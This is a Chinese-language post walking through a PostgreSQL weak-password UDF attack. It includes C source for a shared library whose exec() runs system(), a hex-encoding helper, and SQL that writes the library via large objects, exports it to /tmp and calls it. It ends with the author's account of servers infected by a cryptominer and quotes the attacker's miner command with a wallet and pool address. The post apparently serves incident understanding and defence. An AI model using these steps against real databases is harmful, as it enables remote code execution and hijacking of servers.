postgresql 弱口令 UDF 攻击

1.首先通过端口扫描到弱口令 postgresql 账号密码

2.UDF  自定义函数，本地首先编译制作 so 文件,并上传到服务器

参考:https://www.postgresql.org/docs/9.5/static/xfunc-c.html

 gcc cmd2.c -I`pg_config --includedir-server` -fPIC -shared -o cmd.so

cmd2.c:

#include "stdlib.h"
#include "postgres.h"
#include <string.h>
#include "utils/geo_decls.h"


#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif


/* by value */
int exec(int arg){
  system("ls /root -al> /tmp/result");
  return arg;
}
int
add_one(int arg)
{
    return arg + 1;
}


/* by reference, fixed length */


float8 *
add_one_float8(float8 *arg)
{
    float8    *result = (float8 *) palloc(sizeof(float8));


    *result = *arg + 1.0;


    return result;
}


Point *
makepoint(Point *pointx, Point *pointy)
{
    Point     *new_point = (Point *) palloc(sizeof(Point));


    new_point->x = pointx->x;
    new_point->y = pointy->y;


    return new_point;
}


/* by reference, variable length */


text *
copytext(text *t)
{
    /*
     * VARSIZE is the total size of the struct in bytes.
     */
    text *new_t = (text *) palloc(VARSIZE(t));
    SET_VARSIZE(new_t, VARSIZE(t));
    /*
     * VARDATA is a pointer to the data region of the struct.
     */
    memcpy((void *) VARDATA(new_t), /* destination */
           (void *) VARDATA(t),     /* source */
           VARSIZE(t) - VARHDRSZ);  /* how many bytes */
    return new_t;
}


text *
concat_text(text *arg1, text *arg2)
{
    int32 new_text_size = VARSIZE(arg1) + VARSIZE(arg2) - VARHDRSZ;
    text *new_text = (text *) palloc(new_text_size);


    SET_VARSIZE(new_text, new_text_size);
    memcpy(VARDATA(new_text), VARDATA(arg1), VARSIZE(arg1) - VARHDRSZ);
    memcpy(VARDATA(new_text) + (VARSIZE(arg1) - VARHDRSZ),
           VARDATA(arg2), VARSIZE(arg2) - VARHDRSZ);
    return new_text;
}

java工具: 将cmd.so 二进制文件做成16进制字符串，每行<=2kB

public static String byteToArray(byte[] data){  
   String result="";  
   for (int i = 0; i < data.length; i++) {  
   
       result+=Integer.toHexString((data[i] & 0xFF) | 0x100).toUpperCase().substring(1, 3);
       if((i+1)%2048==0){
    result+="\r\n";
    }
   }  
   return result;  
}  
public static void main(String[] args) throws Exception {
byte[] data=FileUtils.readFileToByteArray(new File("C:\\Users\\martin\\Downloads\\package\\libtest.so"));

String result=byteToArray(data);
System.out.println(result);
}

通过sql命令，将cmd.so 导出到 /tmp 目录下

select lo_creat(-1);
delete from pg_largeobject where loid=390334


select * from pg_largeobject where loid=390334


insert into pg_largeobject (loid,pageno,data) values(390334,0,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,1,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,2,decode('FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,3,decode(''FFXXXXXXXXXXXXX....','hex'))
;


SELECT lo_export(390334, '/tmp/cmd.so');   //导出 到 /tmp 目录

创建函数:

CREATE or replace FUNCTION exec(integer) RETURNS integer
     AS '/tmp/cmd.so', 'exec'
     LANGUAGE C STRICT;


执行自定义函数cmd.c的exec方法:
select exec('1')

可以在方法中执行启动进程等,postgres我们公司2台阿里云服务器被人用这种方式 放了挖矿程序导致cpu占用率100%,研究了一天搞清楚了原理，解决方法将postgresql密码修改复杂

附:

黑客启动的挖矿程序执行进程:

/tmp/iftghlv -c x -M 
stratum+tcp://49rR8E9A3CZN2jdNpJK4NMLYKCM9TLbSEAB4m9FxLgXZC4pvz6mWfxK6NRHv9Y3C3Xa9nqRLjUUHfU7werrSne1DP3Ufgw2:x@xmr.crypto-pool.fr:3333/xmr